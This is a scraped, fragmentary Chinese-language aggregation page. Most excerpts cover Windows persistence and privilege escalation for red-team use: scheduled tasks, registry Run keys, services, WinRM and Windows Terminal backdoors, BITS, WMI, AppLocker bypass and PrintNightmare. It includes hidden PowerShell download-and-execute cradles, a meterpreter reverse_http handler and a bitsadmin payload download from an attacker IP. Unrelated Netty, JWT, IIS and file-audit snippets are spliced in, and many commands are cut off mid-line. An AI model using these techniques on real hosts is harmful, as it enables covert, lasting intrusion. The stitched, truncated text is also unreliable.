Windows权限维持 目录 定时任务 创建隐蔽账号 进程迁移 启动目录 注册服务自启(报毒) 修改注册表实现自启动 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限...比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 定时任务 使用 schtasks 命令创建定时任务 在目标主机上创建一个名为test的计划任务,启动程序为...C:\vps.exe,启动权限为system,启动时间为每隔一小时启动一次。...hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http...findstr test 启动该test计划任务 schtasks /run /i /tn "test" 删除该test计划任务 schtasks /delete /tn "test" /f 如果当期用户权限是普通权限那么
Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http...System权限安装Windows Installer 程序包(MSI)。...但是Windows自带的Windows设置大部分都需要管理权限,这就会遇到一个问题——通知过多。...虽然我前面提到Windows UAC 中有着白名单机制(可自动提升权限),但是这个机制是什么?...新建foreign/reverse_http listener,端口8080 handler -H 10.10.10.128 -P 8080 -p windows/meterpreter/reverse_http
首先提升本进程的权限 BOOL EnaleDebugPrivilege() { HANDLE hToken; BOOL fOk = FALSE; if(OpenProcessToken(GetCurrentProcess...CloseHandle(hToken); } return fOk; } 这里在函数执行完之前验证一下 GetLastError()的返回值 是否是 0 如果返回 1300 则需要 禁止 UAC 权限...HKEY_LOCAL _MACHINE_\SOFTWARE\Microsoft\Windows\CurrentVersion\Policeies\System\ 中找到 EnableLUA 将16...进制的1改为0保存,重启即可安装成功~ 权限提升完后 调用 HANDLE handle=::OpenProcess(PROCESS_ALL_ACCESS,true,pe32.th32ProcessID
简介 上一篇的文章中,我们讲到了如何从HTTP服务器中下载文件,和搭建下载文件服务器应该注意的问题,使用的GET方法。本文将会讨论一下常用的向服务器提交数据的POST方法和如何向服务器上传文件。...HttpVersion就是HTTP协议的版本号,HttpHeaders就是设置的header内容。...request和PostBody encoder: // 构建HTTP request HttpRequest request = new DefaultHttpRequest(HttpVersion.HTTP...总结 HTTP的文件上传需要考虑的问题比较多,大家有不明白的可以参考我的例子。或者留言给我一起讨论。...本文的例子可以参考:learn-netty4 本文已收录于 http://www.flydean.com/21-netty-http-fileupload/
技术篇 对常见的权限维持的技术原理、实现方法、检测技巧进行总结、复现。...注册表类: 普通注册表后门 在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run...普通权限即可运行 cmd下操作: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab...这种行为由注册表管理,该注册表定义在Windows登录期间启动哪些进程。所以我们可以依靠这个注册表来进行权限维持。...WinRM服务后门 基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。
windows2008或者windows2008r2,系统做域内的文件服务器,能否做到谁删除某个共享出来的文件夹或者文件的操作审计?审计级别能做到怎么样一个程度?...回答:依据您的问题您想知道Windows2008文件服务器的审计相关。...Windows server 2003的DC也是支持开启审计功能的,步骤如下: 在DC上打开“Active Directory Users and Computer”。...单击“computer configuration”,双击“Windows setting”,双击“security setting”,双击“local policy”,然后双击“audit policy...Windows server 2008 R2的DC也有这个功能,不同的是组策略的位置与windows server 2003的不一样。
简介 上一篇的文章中,我们讲到了如何从HTTP服务器中下载文件,和搭建下载文件服务器应该注意的问题,使用的GET方法。本文将会讨论一下常用的向服务器提交数据的POST方法和如何向服务器上传文件。...HttpVersion就是HTTP协议的版本号,HttpHeaders就是设置的header内容。...request和PostBody encoder: // 构建HTTP request HttpRequest request = new DefaultHttpRequest(HttpVersion.HTTP...总结 HTTP的文件上传需要考虑的问题比较多,大家有不明白的可以参考我的例子。或者留言给我一起讨论。...本文的例子可以参考:learn-netty4 本文已收录于 http://www.flydean.com/21-netty-http-fileupload/ 最通俗的解读,最深刻的干货,最简洁的教程,众多你不知道的小技巧等你来发现
修改windows系统文件总是提示没有权限,虽然已是administrator也不管用。...以下方法可以解决: 右键属性,安全,高级,所有者,编辑,选择当前用户并确定, 回到上一页再确定, 然后在安全页面点编辑,添加,高级,立即查找,找到当前用户,并确定, 回到安全页面,选择当前用户,给予完全控制权限...,最后确定, 以上操作就是把文件所有者设为当前用户,并且给予完全控制的权限。
目录 共享文件的设置 默认共享 关闭默认共享 关闭共享服务 共享文件夹权限 文件服务器资源管理器的搭建 文件共享是指主动地在网络上共享自己的计算机文件。...在很早期的Windows中(Windows2000以下),文件共享服务是利用TCP的139端口实现的,服务名是SMB。...(这种方法连接的时候要输入具体共享的文件名) 客户端使用任意端口访问文件服务器的TCP 445 端口的共享资源 方法四:在命令行中输入 net use \\ip\c$ /u:administrator...当一个账户通过网络访问一个共享文件夹,而这个文件夹又在一个 NTFS 分区上,那么用户最终的权限是它对该文件夹的共享权限与 NTFS 权限中最为严格的权限 06 文件服务器资源管理器的搭建 使用文件服务器资源管理器高级工具功能...文件夹和卷设置配额 主动屏蔽文件,并生成全面的存储报告 角色,添加角色,选择文件服务,然后再选择文件服务器资源管理器,接着选择磁盘安装即可 配额管理:配额管理在文件服务器资源管理器内是以磁盘或文件夹为单位
通过计划任务添加后门 添加计划任务,每隔1分钟执行一次: 4. services.msc Windows 权限维持 隐藏技巧 "真正"的隐藏文件 命令:Attrib +s +a +h +r [文件...驱动级隐藏文件 工具:Easy File Locker 下载链接:http://www.xoslab.com/efl.html 通过设置其属性,达到对应目的(隐藏后命令行也不可见,只有知道完整目录才能访问...\Microsoft\Windows\CurrentVersion\RunServerOnce 只 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion...Persistence后门 在 Meterpreter 中 Persistence 用于后渗透中的权限维持。...查看 在svchost进程下成功创建了notepad进程 当使用指定账户创建运行计划任务时,当前用户必须具有与之相对或者更高的权限 (使用管理员账户以ystem权限运行计划任务失败) 创建新服务(
系列文章: 权限与认证:JWT 权限与认证:JWT 实践 权限与认证:基于 JWT 的授权实现 一 概述 权限与认证:基于 JWT 的授权实现中提到了登录授权时的token信息拦截和解析,并在验证通过后进行用户信息相关的参数注入...但在真实业务中还会经常遇到这样的需求,授权验证失败,我们希望返回401的HTTP错误码,对应的,可能还有401、302等等其他需求。这里就通过一个示例来进行说明。...二 HTTP常用错误码 这相关的资料百度一搜到处都是,这里就不再重复描述了。...2.2 403-Forbidden 原因:禁止访问,请求是合法的,但是却因为服务器配置规则而拒绝响应客户端请求,此类问题一般为服务器或服务权限配置不当导致。...三 HttpServletResponse中的错误码定义 javax.servlet.http包中的HttpServletResponse是一个接口,继承自ServletResponse。
windows IIS权限经典设置教程根据最新的黑客攻击方法显示,如果在IIS的站点属性打开了“写入”权限,则被黑是轻而易举的事。...而一般在我们使用时,要求大家打开网站所在文件夹的“写入”权限,很多用户以为是在IIS中打开,这是错误的,这样做的结果就是让黑客利用写入权限上传任意文件。IIS中的“写入权限”则一定要关闭!...下面我会以实例的方式来讲解如何设置权限。 例1 —— ASP、PHP、ASP.NET 程序所在目录的权限设置: 如果这些程序是要执行的,那么需要设置“读取”权限,并且设置执行权限为“纯脚本”。...IIS 面板中的“写入”权限实际上是对 HTTP PUT 指令的处理,对于普通网站,一般情况下这个权限是不打开的。 ...IIS 面板中的“脚本资源访问”不是指可以执行脚本的权限,而是指可以访问源代码的权限,如果同时又打开“写入”权限的话,那么就非常危险了。
windows terminal是什么? ? 由于其方便可自定义等特性,被人所喜欢,今天我们就来聊一聊使用该工具进行权限维持。 ?...由于其支持个人配置,所以我们可以在这个方面做文章,其配置文件为json文件,具体格式可参考微软给出的文档(https://docs.microsoft.com/en-us/windows/terminal..."commandline":"powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http
00x1 windows常见的用户 System 本地机器上拥有最高权限的用户 Administrator 基本是本地机器上拥有最高权限的用户了。...,就会报错“HTTP错误401.1 - 未经授权:访问由于凭据无效被拒绝 Everyone用户 Everyone(所有人)的账号权限赋予的是所有人的权限,使用这个用户的时候配置权限一定要特别小心 00x2...windows常见的组 Administrators 基本是本地机器上拥有最高权限的用户组了,administrator隶属于它。...HTTP.sys 中所有的代码都是以Local System权限执行的 所有的工作进程都是用Networkservice的权限执行的 Network service是windows 2003中心内置的一个被严格限制的账户...这个认知了,其他的都差不多了~ 可以去做这么两个实验: 实验1:webshell权限和本机操作权限 实验2:不同平台(如自带的iis和phpstudy)下的webshell权限 关于http.sys这个文件在
\Run /v "123" /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f 同样需要管理员权限,代码跟上面差不多 ?...HKEY_CURRENT_USER同理,但不需要管理员权限 ? 自启动服务后门 在 Windows上还有一个重要的机制,也就是服务。...这些实用程序之一是后台智能传输服务(BITS),它可以促进文件到Web服务器(HTTP)和共享文件夹(SMB)的传输能力。...\bitsadmin.exe /transfer backdoor /download /priority high "http://192.168.1.106/CM.EXE" C:\1.exe ?...这里可以改成我们的马,达到维持权限的效果,具体时间为注册表的ScreenSaverTimeout值有关 0x12 WMI构造无文件后门 WMI是一项Windows管理技术,其全称是Windows Management
对于我这样喜欢折腾测试软件的人来说,没有管理员权限是很痛苦的一件事情!还未推广 Win7 时,我就用了这个获取 System 权限的办法,变相的取得管理员权限,而网域监测系统却不会报警。...cmd 窗口,因为系统服务都是管理员权限创建的,所以调出来的 CMD 也是有管理员权限的。...即可打开一个具有管理员权限的 CMD 窗口!这时候你就可以再 CMD 中执行需要管理员权限的所有动作了,比如安装软件、新建账号等等,而这一切都可以避开 AD 的监控机制哦!...话说这个账号的权限级别比 Adminsitrator 还要高呢!...网上说是 System 权限,我也不管它是不是 system 权限了,反正我知道就算是普通账号环境,只要调出上图的 CMD,就可以做到 Adminsitrator 能做的所有事情,这就是我所需要的!
前言 在这篇文章中,我们将讨论 AppLocker 绕过的主题,这可以被视为 Windows 权限升级的一步,因为 AppLocker 会填充我们执行传输到受害者的任何文件的所有尝试。...从那里,我们在攻击者机器上设置了一个 HTTP 服务器,然后将 winPEAS 下载到受害者上。 如果您没有 winPEAS 的副本,可以在此处获取一份。...好吧,我们可以检查 C:\Program Files 和 C:\Windows 中所有文件夹的权限;然而,幸运的是,有人已经这样做了,并创建了标准用户可以在 C:\Windows\* 中写入的默认文件夹列表...\Tasks\Microsoft\Windows\PLA\System 现在,作为攻击者,我们的任务是确认我们对每个文件夹的权限。...这是绕过AppLocker的最简单方法;但是,我们可能会发现管理员对 C:\Windows\* 中的默认可写文件夹进行了强化权限。如果是这种情况,我们需要一种替代方法来执行绕过。
Windows权限报错相关问题可以通过这个解决方法: 1 文件夹右键 -- 属性 : 2 安全 -- 编辑: 3 添加 everyone : 4 everyone的权限修改为 完全控制: 5...用户权限如下: 1、、管理员账户 具有最高的管理和使用权限,能改变系统所有设置,可以安装和删除程序,能访问计算机上所有的文件。除此之外,它还拥有控制其他用户的权限。...3、、来宾账户 来宾账户仅有最低的权限,无法对系统做任何修改!是给那些在计算机上没有用户账户的人的一个临时账户,主要用于远程登录的网上用户访问计算机系统。...该访问令牌包含有关授予给该用户的访问权限级别的信息,其中包括特定的安全标识符(SID) 信息和 Windows 权限。...标准用户访问令牌包含的用户特定信息与管理员访问令牌包含的信息相同,但是已经删除管理 Windows 权限和 SID。标准用户访问令牌用于启动不执行管理任务的应用程序。
一丶简介 在System权限启动我们的程序之后.如果程序内部使用了GetTempPath()函数.或者使用了其它跟用户权限有关的函数.则获取的路径不是你想要的....比如 你在System权限下使用了GetTempPath() 那么获取的temp路径有可能就是 "C:\Windows\Temp" 而我们想要获取的路径则是 "C:\user\xxx\Appdata\local...原理就是 使用用户权限的Token 配合函数ExpandEnvironmentStringsForUserW 函数来获取.
Windows Print Spooler权限提升漏洞(PrintNightmare) 目录 一:漏洞概述 二:影响范围 三:漏洞利用 漏洞过程 创建匿名SMB共享...Print Spooler权限提升漏洞(CVE-2021-1675),该漏洞被标记为提权漏洞。...该服务对应的进程 spoolsv.exe 以SYSTEM权限执行,其设计中存在的一个严重缺陷,由于 SeLoadDriverPrivilege 中鉴权存在代码缺陷,参数可以被攻击者控制,普通用户可以通过...Core installation) - Windows Server 2008 for 32-bit Systems Service Pack 2 - Windows RT 8.1 - Windows...参考: http://blog.nsfocus.net/windows-print-spoolercve/ https://github.com/hhlxf/PrintNightmare https:/
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
